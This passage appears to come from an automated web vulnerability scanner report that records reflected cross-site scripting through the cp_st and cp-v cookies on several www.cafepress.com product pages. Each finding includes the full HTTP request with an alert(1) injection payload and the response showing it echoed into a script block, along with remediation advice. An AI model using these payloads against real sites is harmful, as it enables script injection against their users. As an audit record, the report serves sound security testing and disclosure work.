The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b326</script><script>alert(1)</script>7b9d98d964e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-hoodies-sweatshirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=9b326</script><script>alert(1)</script>7b9d98d964e; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 69636
Date: Sun, 26 Dec 2010 13:47:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 69636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '9b326</script><script>alert(1)</script>7b9d98d964e'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.106. http://www.cafepress.com/make/custom-ipad-case [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-ipad-case

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8db02"-alert(1)-"9bd63bb7d30 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-ipad-case HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8db02"-alert(1)-"9bd63bb7d30; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 55461
Date: Sun, 26 Dec 2010 13:48:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8db02"-alert(1)-"9bd63bb7d30";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.107. http://www.cafepress.com/make/custom-ipad-case [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-ipad-case

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc4d</script><script>alert(1)</script>d48aac4b022 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-ipad-case HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ccc4d</script><script>alert(1)</script>d48aac4b022; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 55481
Date: Sun, 26 Dec 2010 13:48:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'ccc4d</script><script>alert(1)</script>d48aac4b022'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.108. http://www.cafepress.com/make/custom-iphone-cases [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-iphone-cases

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51aff"-alert(1)-"90ad1b3827e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA51aff"-alert(1)-"90ad1b3827e; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 57100
Date: Sun, 26 Dec 2010 13:48:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA51aff"-alert(1)-"90ad1b3827e";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.109. http://www.cafepress.com/make/custom-iphone-cases [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-iphone-cases

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c70c</script><script>alert(1)</script>36986f285d4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=3c70c</script><script>alert(1)</script>36986f285d4; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 57121
Date: Sun, 26 Dec 2010 13:48:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '3c70c</script><script>alert(1)</script>36986f285d4'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.110. http://www.cafepress.com/make/custom-mugs [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-mugs

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46ce6"-alert(1)-"366e3ae2b93 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 